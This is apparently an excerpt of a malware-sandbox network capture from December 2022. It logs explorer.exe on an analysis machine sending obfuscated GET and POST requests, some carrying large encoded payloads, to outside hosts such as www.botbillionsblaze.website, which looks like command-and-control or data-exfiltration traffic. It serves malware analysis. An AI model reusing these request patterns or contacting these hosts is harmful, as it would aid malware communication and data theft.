                                                                                                                                                                          Data Ascii: efR0agWjRLlWSef2Qr(kglHkeZByorXj6HNECpsxeAuzICiI4MRttqjBxmIpPLhEwsT0vPdh1ClZ82o-3kd80ImsyU38q5u4EcmT3yJQA4Okv3OcflVhVAz3NLikq2Sl4VEhDmTmfu0Tg39ud5h58y73~AXneLwwAQbwKAMNgMZO21ancTm5Dnylj4zfSjcpRaxXiCXYEQ4sKkWOED4Ybl2g2xz7qUzo524JmPRZFD7LjkNhTZN
                                                                                                                                                                          Dec 5, 2022 15:16:03.957668066 CET11437OUTData Raw: 73 39 67 61 62 32 47 36 39 55 6c 64 39 78 7e 6c 35 64 57 49 67 76 71 6a 4d 79 66 4d 35 4a 71 79 63 54 55 77 6a 71 6b 53 68 41 4c 30 6e 66 6b 55 39 6b 4e 38 70 54 32 42 5a 39 37 56 4e 69 54 59 34 42 66 57 69 75 53 45 49 57 38 37 68 51 44 79 42 71
                                                                                                                                                                          Data Ascii: s9gab2G69Uld9x~l5dWIgvqjMyfM5JqycTUwjqkShAL0nfkU9kN8pT2BZ97VNiTY4BfWiuSEIW87hQDyBqHoRlPy41p6XOq2OL1xN7avnPAYROXCN0uhIw8Kgk0VS4A8wTj9lEC5rSKhGxPYHZENHeNB~viRyjedxUIMsqMAWHeZyl8rt3gBCyi1FTA67TopxdDJV9t73ytrHbxg(ttwTnvkIcKnR9S-0sshIytv5vvxTlWc0bZ
                                                                                                                                                                          Dec 5, 2022 15:16:03.958008051 CET11440OUTData Raw: 31 34 44 5a 6d 6f 6d 43 58 4c 57 69 6c 2d 52 57 79 56 78 6a 53 77 48 6c 4c 6d 64 34 6b 6e 34 75 64 58 61 56 37 32 47 73 64 72 39 50 61 45 39 59 47 4a 31 64 49 31 6b 78 4c 6e 49 51 71 75 56 63 38 36 76 43 28 44 67 70 38 67 45 6c 45 52 38 77 6b 72
                                                                                                                                                                          Data Ascii: 14DZmomCXLWil-RWyVxjSwHlLmd4kn4udXaV72Gsdr9PaE9YGJ1dI1kxLnIQquVc86vC(Dgp8gElER8wkrrjK54i~tF2gWTY2Vbb5LrqnirR42SPzoOTKFZVIZR06iNwofezA-dizj~xwrENI_iDfQgVrVWLFHfpJiJjWYta99773t~b0g7WyGqRqVQTqyJPRxEyBD9tUZwcZVtvR_z20rDJ5WVxMTddRrT84e7vTiHBq9wRnO2
                                                                                                                                                                          Dec 5, 2022 15:16:03.984997988 CET11445INHTTP/1.1 403 Forbidden
                                                                                                                                                                          Date: Mon, 05 Dec 2022 14:16:03 GMT
                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Server: nginx
                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                          Content-Encoding: gzip
                                                                                                                                                                          Data Raw: 36 62 0d 0a 1f 8b 08 00 00 00 00 00 04 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 56 70 cb 2f 4a ca 4c 49 49 cd b3 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 b4 24 a7 e6 95 a4 16 d9 d9 64 18 a2 eb 00 8a d8 e8 43 a5 41 66 03 15 41 79 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 6d 78 95 8e 92 00 00 00 0d 0a
                                                                                                                                                                          Data Ascii: 6b(HML),I310Vp/JLII&T$dCAfAyyyr0.mx
                                                                                                                                                                          Dec 5, 2022 15:16:03.985038996 CET11445INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                          22192.168.11.204986075.2.81.21280C:\Windows\explorer.exe
                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                          Dec 5, 2022 15:16:05.965394974 CET11446OUTGET /nqhc/?7nWHV=f4F7ffrY91VPAaIYxk1J2He+DN38Gtglpvx7SxOWIh8xSFztRImtD0B4ZlSdLvIOg82xMJ3Gh/Bbh1FonXE4rjX3AOld5zRxFA==&t0D=yFNHS0IX HTTP/1.1
                                                                                                                                                                          Host: www.gumba.shop
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                          Data Ascii:
                                                                                                                                                                          Dec 5, 2022 15:16:06.114550114 CET11446INHTTP/1.1 403 Forbidden
                                                                                                                                                                          Date: Mon, 05 Dec 2022 14:16:06 GMT
                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                          Content-Length: 146
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Server: nginx
                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                          Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                          23192.168.11.20498612.57.90.1680C:\Windows\explorer.exe
                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                          Dec 5, 2022 15:16:11.208053112 CET11447OUTPOST /nqhc/ HTTP/1.1
                                                                                                                                                                          Host: www.botbillionsblaze.website
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Content-Length: 187
                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                          Origin: http://www.botbillionsblaze.website
                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                          Accept: */*
                                                                                                                                                                          Referer: http://www.botbillionsblaze.website/nqhc/
                                                                                                                                                                          Accept-Language: en-US
                                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                                          Data Raw: 37 6e 57 48 56 3d 45 71 56 72 78 4d 52 48 4c 42 43 77 74 49 62 4a 66 41 68 52 71 43 52 4d 49 47 52 69 76 5a 75 50 35 61 70 4c 47 30 7e 49 48 47 4b 36 61 36 42 64 71 72 46 39 31 53 53 38 65 43 45 79 73 31 59 37 52 49 59 35 7e 43 68 30 54 62 64 6e 6b 6b 6b 59 32 70 72 56 61 76 30 6a 70 63 47 44 64 53 51 53 43 6b 32 56 43 43 61 52 65 39 5a 68 54 50 4b 4e 42 78 34 51 6e 78 6d 75 36 6a 62 30 79 6a 6b 49 61 47 4d 44 65 34 6b 39 61 47 50 67 59 55 4f 4b 68 79 4e 54 70 53 52 54 33 46 4b 6c 39 69 34 52 70 58 62 33 68 38 4b 52 5a 55 52 48 67 62 52 4e 56 77 29 2e 00 00 00 00 00 00 00 00
                                                                                                                                                                          Data Ascii: 7nWHV=EqVrxMRHLBCwtIbJfAhRqCRMIGRivZuP5apLG0~IHGK6a6BdqrF91SS8eCEys1Y7RIY5~Ch0TbdnkkkY2prVav0jpcGDdSQSCk2VCCaRe9ZhTPKNBx4Qnxmu6jb0yjkIaGMDe4k9aGPgYUOKhyNTpSRT3FKl9i4RpXb3h8KRZURHgbRNVw).
                                                                                                                                                                          Dec 5, 2022 15:16:11.231944084 CET11448INHTTP/1.1 404 Not Found
                                                                                                                                                                          Server: nginx
                                                                                                                                                                          Date: Mon, 05 Dec 2022 14:16:11 GMT
                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                          Content-Length: 146
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                          24192.168.11.20498622.57.90.1680C:\Windows\explorer.exe
                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                          Dec 5, 2022 15:16:13.268534899 CET11449OUTPOST /nqhc/ HTTP/1.1
                                                                                                                                                                          Host: www.botbillionsblaze.website
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Content-Length: 527
                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                          Origin: http://www.botbillionsblaze.website
                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                          Accept: */*
                                                                                                                                                                          Referer: http://www.botbillionsblaze.website/nqhc/
                                                                                                                                                                          Accept-Language: en-US
                                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                                          Data Raw: 37 6e 57 48 56 3d 45 71 56 72 78 4d 52 48 4c 42 43 77 69 49 72 4a 61 6a 5a 52 28 53 52 50 57 57 52 69 32 70 75 78 35 61 56 4c 47 31 71 59 48 77 61 36 64 65 4a 64 34 75 6c 39 79 53 53 38 57 69 45 33 6a 56 59 79 52 49 63 48 7e 48 5a 30 54 62 4a 6e 6c 56 45 59 33 5a 72 61 52 50 30 73 68 38 47 34 4d 43 51 4d 43 6b 4b 33 43 44 4f 52 65 4e 46 68 43 35 57 4e 51 31 56 47 71 78 6d 67 38 6a 62 37 70 7a 6b 4f 61 47 78 30 65 36 6b 4c 5a 77 48 67 59 31 75 4b 67 79 4e 53 77 79 52 49 72 31 4c 56 7e 68 6c 37 69 6c 66 55 37 38 53 2d 64 45 63 4b 30 4a 4e 4a 4b 61 46 48 68 62 7e 66 57 66 50 56 41 59 63 76 32 4d 33 79 72 2d 6e 59 32 62 59 65 6e 39 68 35 41 4f 63 57 56 77 7a 50 46 4b 65 33 6a 6f 48 7a 46 68 6d 53 46 36 31 4d 64 71 38 32 71 62 38 33 28 33 71 6a 32 53 46 2d 32 46 37 79 43 6f 79 50 74 4c 78 76 35 55 63 79 4f 43 4a 73 65 49 35 73 47 47 7e 79 6b 67 6b 49 52 4e 77 59 66 52 54 73 76 36 39 72 4b 66 39 4a 6d 51 63 64 31 67 59 62 31 47 66 71 44 45 56 6f 32 4a 49 6f 6f 32 67 54 32 54 47 5a 28 7a 44 4f 6d 41 5a 4e 58 7a 73 47 4a 69 76 62 37 2d 47 35 69 31 55 62 50 46 53 52 46 52 32 65 41 32 67 72 51 6c 4d 67 44 56 51 79 35 50 4e 32 41 49 31 59 63 57 38 74 6c 4d 34 30 43 71 33 6c 46 73 50 6c 50 66 45 45 52 63 70 32 55 4b 74 46 71 6a 53 43 4e 51 50 65 35 35 56 43 4e 79 73 47 65 6d 46 4b 30 37 54 33 6f 6c 36 4f 7a 66 4d 70 66 75 5a 5a 71 5f 45 36 6a 31 50 45 75 62 72 76 35 33 43 59 31 71 4e 47 6a 6c 54 6d 42 42 76 65 78 39 73 4b 73 73 4e 4a 6f 45 28 6a 46 67 63 72 75 2d 38 68 4c 61 72 6c 58 7a 71 30 77 5f 50 4e 53 46 6d 4f 68 49 55 42 5a 4e 42 5a 49 2d 46 79 35 5f 45 2e 00 00 00 00 00 00 00 00
                                                                                                                                                                          Data Ascii: 7nWHV=EqVrxMRHLBCwiIrJajZR(SRPWWRi2pux5aVLG1qYHwa6deJd4ul9ySS8WiE3jVYyRIcH~HZ0TbJnlVEY3ZraRP0sh8G4MCQMCkK3CDOReNFhC5WNQ1VGqxmg8jb7pzkOaGx0e6kLZwHgY1uKgyNSwyRIr1LV~hl7ilfU78S-dEcK0JNJKaFHhb~fWfPVAYcv2M3yr-nY2bYen9h5AOcWVwzPFKe3joHzFhmSF61Mdq82qb83(3qj2SF-2F7yCoyPtLxv5UcyOCJseI5sGG~ykgkIRNwYfRTsv69rKf9JmQcd1gYb1GfqDEVo2JIoo2gT2TGZ(zDOmAZNXzsGJivb7-G5i1UbPFSRFR2eA2grQlMgDVQy5PN2AI1YcW8tlM40Cq3lFsPlPfEERcp2UKtFqjSCNQPe55VCNysGemFK07T3ol6OzfMpfuZZq_E6j1PEubrv53CY1qNGjlTmBBvex9sKssNJoE(jFgcru-8hLarlXzq0w_PNSFmOhIUBZNBZI-Fy5_E.
                                                                                                                                                                          Dec 5, 2022 15:16:13.292660952 CET11449INHTTP/1.1 404 Not Found
                                                                                                                                                                          Server: nginx
                                                                                                                                                                          Date: Mon, 05 Dec 2022 14:16:13 GMT
                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                          Content-Length: 146
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                          25192.168.11.20498632.57.90.1680C:\Windows\explorer.exe
                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                          Dec 5, 2022 15:16:15.324063063 CET11455OUTPOST /nqhc/ HTTP/1.1
                                                                                                                                                                          Host: www.botbillionsblaze.website
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Content-Length: 51815
                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                          Origin: http://www.botbillionsblaze.website
                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                          Accept: */*
                                                                                                                                                                          Referer: http://www.botbillionsblaze.website/nqhc/
                                                                                                                                                                          Accept-Language: en-US
                                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                                          Data Raw: 37 6e 57 48 56 3d 45 71 56 72 78 4d 52 48 4c 42 43 77 69 49 72 4a 61 6a 5a 52 28 53 52 50 57 57 52 69 32 70 75 78 35 61 56 4c 47 31 71 59 48 77 53 36 64 70 4a 64 71 50 6c 39 7a 53 53 38 56 69 45 32 6a 56 5a 67 52 49 6b 39 7e 48 46 65 54 5a 78 6e 6c 45 55 59 30 76 28 61 55 50 30 74 69 38 47 41 64 53 51 59 43 6b 32 72 43 44 61 65 65 39 42 68 54 4f 36 4e 42 55 55 51 79 78 6d 75 38 6a 62 6e 28 44 6c 74 61 47 31 6b 65 36 34 4c 5a 79 7a 67 61 48 6d 4b 73 46 68 53 71 53 52 58 67 56 4c 61 30 42 6c 65 69 68 28 71 37 38 53 49 64 46 6f 4b 30 4c 56 4a 4c 5a 64 45 68 37 7e 66 49 76 50 53 45 59 52 6b 32 4d 62 55 72 2d 37 59 32 5a 6f 65 6c 64 68 35 56 66 63 52 57 51 79 45 42 4b 65 6b 6e 6f 44 37 46 68 61 47 46 34 35 4d 64 36 6f 32 77 4b 38 33 38 56 4f 6a 7e 53 46 38 79 46 37 74 55 59 7a 51 74 4c 42 7a 35 56 39 50 4f 46 4a 73 59 6f 5a 73 51 55 47 78 6a 41 6b 4b 64 74 77 42 4a 68 66 6f 76 2d 5a 38 4b 66 39 6a 6d 55 6b 64 31 52 6f 62 30 48 66 74 41 55 56 56 76 5a 49 48 6d 57 6c 53 32 54 61 52 28 79 37 65 6d 43 31 4e 56 54 73 47 66 52 47 4e 69 65 47 2d 36 46 55 4a 51 56 54 52 46 52 72 39 41 33 6b 52 58 52 45 67 41 46 41 79 7e 66 4e 31 43 6f 30 52 57 32 38 52 30 63 34 30 43 71 36 42 46 70 58 6c 4f 74 55 45 52 72 74 32 52 5a 56 46 73 6a 54 4a 4e 51 4f 61 35 35 52 48 4e 79 6c 52 65 6d 5a 77 30 34 28 33 70 77 6d 4f 30 65 4d 75 62 65 5a 51 75 5f 46 69 75 56 44 70 75 62 6e 64 35 33 54 76 79 5a 5a 47 69 6c 44 6d 46 42 76 66 37 39 73 4e 36 38 4e 62 28 55 44 4a 46 67 42 63 75 5f 35 2d 4c 59 37 6c 58 53 4b 76 67 75 66 71 4d 31 32 5a 6a 4d 55 43 52 4c 5a 46 61 72 70 73 6e 5a 71 7a 68 33 44 42 5a 74 33 55 78 59 67 55 31 62 69 6e 4c 44 4a 41 71 54 6b 56 72 6b 76 55 35 5f 4a 55 79 4d 6e 38 63 76 76 4e 57 31 74 4d 56 48 46 41 61 37 70 75 74 55 77 4f 64 53 66 45 59 5a 47 67 35 43 6c 69 68 30 51 7a 28 56 32 75 36 39 67 58 42 32 7e 43 4a 6e 63 4b 32 5a 61 70 4c 76 32 47 33 79 61 67 61 6f 69 77 33 47 6e 44 62 39 34 75 30 69 4c 53 54 63 6f 56 74 41 6f 72 62 70 44 73 46 64 6f 6a 41 73 46 66 42 75 6d 33 41 48 71 73 7e 48 57 50 77 52 44 6e 28 6f 35 56 49 62 35 30 47 7a 56 70 43 5f 5a 5a 75 4f 6e 77 42 50 43 2d 28 47 7a 62 54 2d 48 37 59 35 75 32 48 4f 72 6e 56 62 69 77 4d 43 4b 4b 28 7a 78 30 54 76 78 75 48 78 38 42 31 38 49 32 47 6b 4c 35 70 70 72 4f 77 38 4d 58 31 39 6c 4c 76 48 68 44 79 6b 4a 6a 59 52 46 71 6a 43 69 6a 46 66 79 45 57 66 73 38 55 69 59 50 43 32 58 66 68 57 50 37 6c 37 50 32 44 5a 30 69 75 46 4f 39 36 78 35 41 48 5f 69 75 76 52 77 65 79 36 4f 56 54 32 57 78 67 70 65 58 50 79 51 46 4c 31 36 68 7a 55 4a 31 50 77 67 71 48 41 6b 53 6b 44 6f 63 71 64 7a 65 55 45 36 79 42 66 77 68 33 78 79 70 57 39 7e 75 45 39 76 49 35 43 67 4d 6d 6c 6d 33 70 65 41 59 46 78 33 4c 45 72 39 49 73 49 78 2d 4f 4b 51 7a 38 55 78 72 56 30 4b 49 5a 4a 55 31 7e 2d 45 7a 28 6a 68 5f 78 70 4b 4b 59 7a 63 39 72 6e 63 77 46 4d 6c 77 39 37 63 62 35 4e 61 66 6c 47 43 73 70 64 53 73 38 72 69 39 70 62 46 43 46 4b 6c 36 6a 57 4c 79 50 35 55 4b 39 69 72 31 6e 6d 6a 4c 36 41 58 45 4c 6b 4b 56 62 39 75 6d 51 37 7e 34 67 57 6a 52 65 69 47 39 59 39 47 6e 31 2d 6b 36 36 56 42 41 34 36 30 35 77 30 51 5f 54 5f 73 6a 51 2d 4a 37 4c 67 30 49 79 76 6f 57 6b 57 5a 45 30 53 64 51 38 71 69 4e 55 74 30 75 53 78 68 4d 35 45 33 70 61 30 28 32 45 6a 36 65 41 58 71 57 59 4c 53 48 77 43 31 4d 33 46 58 7a 61 6c 6b 79 49 56 77 44 79 51 64 35 56 64 62 46 65 68 59 5a 45 53 77 2d 6b 66 52 46 75 62 28 55 46 7a 7a 36 76 54 31 62 7e 77 6d 31 35 6d 4d 33 7a 4d 68 64 65 72 63 72 31 70 6e 4e 7e 44 78 43 39 57 59 5a 49 4b 43 34 37 6a 71 56 68 66 30 51 48 4d 53 51 4e 73 5a 63 75 49 62 6e 67 57 54 38 55 51 6d 2d 32 45 6f 6c 43 58 44 59 6d 48 48 35 6d 6d 65 4c 62 32 31 73 4a 59 39 65 70 35 58 6d 54 37 46 79 4e 4f 7a 30 74 64 28 66 6e 56 4e 61 42 79 6a 46 75 70 76 4c 42 6e 79 4d 41 67 6c 30 71 2d 34 74 70 30 66 6e 73 65 6a 77 34 6d 6c 33 44 42 7e 42 51 4b 72 47 62 46 37 53 4f 65 64 34 4f 30 79 4d 76 65 48 4e 45 6f 54 78 4f 35 53 55 6c 49 6f 51 48 66 66 57 45 47 4f 71 46 50 68 67 76 65 4e 66 77 47 4b 41 66 6b 42 53 39 47 7a 47 6c 49 4f 53 64 66 31 45 50 4e 6a 71 69 30 43 5a 64 34 44 54 77 4f 59 53 52 65 64 7a 4e
                                                                                                                                                                          Data Ascii: 7nWHV=EqVrxMRHLBCwiIrJajZR(SRPWWRi2pux5aVLG1qYHwS6dpJdqPl9zSS8ViE2jVZgRIk9~HFeTZxnlEUY0v(aUP0ti8GAdSQYCk2rCDaee9BhTO6NBUUQyxmu8jbn(DltaG1ke64LZyzgaHmKsFhSqSRXgVLa0Bleih(q78SIdFoK0LVJLZdEh7~fIvPSEYRk2MbUr-7Y2Zoeldh5VfcRWQyEBKeknoD7FhaGF45Md6o2wK838VOj~SF8yF7tUYzQtLBz5V9POFJsYoZsQUGxjAkKdtwBJhfov-Z8Kf9jmUkd1Rob0HftAUVVvZIHmWlS2TaR(y7emC1NVTsGfRGNieG-6FUJQVTRFRr9A3kRXREgAFAy~fN1Co0RW28R0c40Cq6BFpXlOtUERrt2RZVFsjTJNQOa55RHNylRemZw04(3pwmO0eMubeZQu_FiuVDpubnd53TvyZZGilDmFBvf79sN68Nb(UDJFgBcu_5-LY7lXSKvgufqM12ZjMUCRLZFarpsnZqzh3DBZt3UxYgU1binLDJAqTkVrkvU5_JUyMn8cvvNW1tMVHFAa7putUwOdSfEYZGg5Clih0Qz(V2u69gXB2~CJncK2ZapLv2G3yagaoiw3GnDb94u0iLSTcoVtAorbpDsFdojAsFfBum3AHqs~HWPwRDn(o5VIb50GzVpC_ZZuOnwBPC-(GzbT-H7Y5u2HOrnVbiwMCKK(zx0TvxuHx8B18I2GkL5pprOw8MX19lLvHhDykJjYRFqjCijFfyEWfs8UiYPC2XfhWP7l7P2DZ0iuFO96x5AH_iuvRwey6OVT2WxgpeXPyQFL16hzUJ1PwgqHAkSkDocqdzeUE6yBfwh3xypW9~uE9vI5CgMmlm3peAYFx3LEr9IsIx-OKQz8UxrV0KIZJU1~-Ez(jh_xpKKYzc9rncwFMlw97cb5NaflGCspdSs8ri9pbFCFKl6jWLyP5UK9ir1nmjL6AXELkKVb9umQ7~4gWjReiG9Y9Gn1-k66VBA4605w0Q_T_sjQ-J7Lg0IyvoWkWZE0SdQ8qiNUt0uSxhM5E3pa0(2Ej6eAXqWYLSHwC1M3FXzalkyIVwDyQd5VdbFehYZESw-kfRFub(UFzz6vT1b~wm15mM3zMhdercr1pnN~DxC9WYZIKC47jqVhf0QHMSQNsZcuIbngWT8UQm-2EolCXDYmHH5mmeLb21sJY9ep5XmT7FyNOz0td(fnVNaByjFupvLBnyMAgl0q-4tp0fnsejw4ml3DB~BQKrGbF7SOed4O0yMveHNEoTxO5SUlIoQHffWEGOqFPhgveNfwGKAfkBS9GzGlIOSdf1EPNjqi0CZd4DTwOYSRedzNyPYuX3yaUp47ZNEA6gr6N7siB5noOsCYuA89QGkKJMJ3cA3p4uPkEr0oxj3JzQxaRY3jR7QQa0sB988ShXtp1ESKZGNJQAJaqRgpZ4d~KyizngnQS6VBY38zzrj41dOcAm2b31w9eLqfTidFc0eCrDi(QRINHLPfYgI7V83jwv01JEFEz049oNl86vUIghru8Vd1_y5OidPLdb3Po(R6uUniDwZH1aHJrTT1r3y6pJjx5tUYyu-H8sM4l(hccCP~orQ(Dmpm_RG3uqwSA~aDIeNBtI-zfsSWNCjaY8nhe8TbWS1R1bMb7NKl4hZBfkBKmp8i1JPyiKNEoJNq-lzezgNsC8oIgY1psPJmZHgYXH7QA5FkYW5ymKvleLMFCvprsBgwldGEP60Se3F0rIjDBASQbQz5ya8jo9V4y15FQbBEgUyuAlWGV3LncPjlBOQtFbWFxtMpkaruvmwP220i0~ad3tOagMYnuQPWJX49DC12nlyosFM4lfVrrGIrjzqi-uGJ7yH350Q9OQP4EXLoIOaO9i6r9qweZqZUdqVzlPxZ_MkaPXFjDct39AuRfL2vcjONNQ_qxhmrGujAbJpSx~hBwKqz4sXXo3cEsZ0VBy9yX7t9QFRiL(oI_RzjNKClhzOhVS-oJ82LXu6kRzcdPGhY2jS1N~yV9MZNyfIfP9ji-l_JgjySu5v1ArUe-MHHur5CNdIXTmhWymRq7KS8x17fFh4OxbJS1D1ytJ-xpQJ4puP8o8bIk(YGblOrHd-bvyKhwEL2mGR4_Ejvvec~xflDQm_G2w2DRExWeyfTYydTqo9B026xnmbJCqVq-~IqrLpyC0y(OJbncZ7oIJ6E6rKACh1LoF_42SrAahv9YH6PUwhKMcmSHktV_oWto217JJV13oc21M7PTzFWbacrEafagypWfi84yl70oMm7sGpdDFV5lrMYhs4Sd3rg4o4arH_ry84dMIjr55zvw43ut4ZKmP_rIfkiK4QHfQCwTXLx9YI(ke_UMlghr(-qwowXaMUxXPN3jyqCcD4uUWO33nZ7fx9bhOCMZ30JbLERc7Rf3SdEN5JY89MxRChv3detFxbzb(VFVLr27RDLmou(a67TEoUs4K2ZVTxCr1PyeQzuGFuFaD1wP5ad6JOyHq4Tus6KhFyWlYQWIHyozssZsPnYPgk5WL9b18yV1skNqRcJxT5Ex3hHwXwbXZmXKgVMpJv0k(6PVs9uelbbpXg7DNXon0Z92Ea9ZDNdjU-ur4WHcbht8u6aQXNZosF1im782CPcYEDbe2zYUAmBc8qDkbP0q0v6VypcRDL~FGV76y4wXEckVYF6ArIhmVpCNDUNAdxfyruF5tFF1~8jfj67URcX0TweO7cyAyPIUPEZJGCLSpn(A1PzyMJ~WtPERwsVNVMX9vaS2RfQYOUgDf_Kkj1(WwGGBW0b3ftlLCV6T8BoFUUdDiyUdL0HJiAh9MhohG0du0uXYV4IkNF9GqPQmP02EzCIOd8RrVE(oWnKsYNv7ngXVLhugT-2Xd2yMRvUAaYtvtlBBTVpGlOYySzkTWGplgle4XEk3U11DzW(PiNHN7jCW5XZIYmx4x4sbMzGnW5tCzOJAiS~5nh(JnFrnx2Ox1mRw9Hwb0WSC2pWadHSe1Lv9OooDqgnPpNdKELq7W1q_cBF8beAf4v(37ZTAmalA09sAul1Mha6V0CjiNPjIa2HdAJMds9ipQ0uEPgnPz25eBZhNJCXGKZcUGcoDUYRSLOwt68tBkXmCQ9nczM2DhG0UfqRmvDU9lxk6JohKaIzhh4tQc1Jzt1Ul2_ZtMF7maFCI1-vYAy4r(JEGmfjIwkyWm5anCR5H10wpk-qAjcnheFCOnd0lNHBSzsnN5IM4zxawDeABt-Lqsh8dgJ2JRg9ur76n4jOAhWSvyfv5oaPU5qoE0LAvM575AFHgHOfISxpYhJGad5AM2mvXwUl0ozmhzhSQWblke9ParlsVDZxLXUlA6vOyFm4QaRgPt8sH1IJn1FXMhz8rX_8QpRTRbpFes2qMhkAQ3HINS-sWlh2qLIs2dmziX86eQE(uu-a-7XmeHSmEUn9sccvdCw4n1ccbiNfScVBxKxKE(HoqzNrWEQM347q_m6~Qg_pa05oQa5u0y2jLGXtb6fP6jQOUL9zxt2dzTeFFVCZw5TyX8fJ3pVtPBNsGQu8YZlUKmmjhbljMgJU5SEtwkSvunGl9b3uH1T6qnyWChbA9hx59NQcVIZ5SL5K-F-49xSetATqOK7RL9FkDyh8pOH4KlZjoz4M1DkbmFMieWy2s7erxNbShpBtEg_vMBWWUKWIPsCUd~m2Rmh2C6Z5Dpbllqyku5hKozw4W~7tao-DTOXayF2BmdDAcANH6VImalsTuzyZjRHjvR0wAoxKe7KKXh742ZorDfpXGl7oOMn7nHGWqyOVhAyvl8FTFmdyFXpwOxBVQaDklhw86jH(GPtb3DjBgZeA_puDdo9~R5XZFkXAJDRgkj2ZmkZX51TiP7RQG1mEhU6yBUfsX7LSDI8MVWMjst57SUnsUaAxDTgDLx8Bv~qw1V_~yFKCNAUgjSIHxx8os5ZqIZVUOZbpl(fc3fiNOXuF1gOMHevEYY-(C0aKeg5pcViZJ7q9ghGlXYDxWtYynNAgY7B8ahA9pGbs7p79K~Zbg5ykENQ5z4_VMCp4FrzmRb_wOIqUXgTX5Al4BGWayVHoYLt~WTT
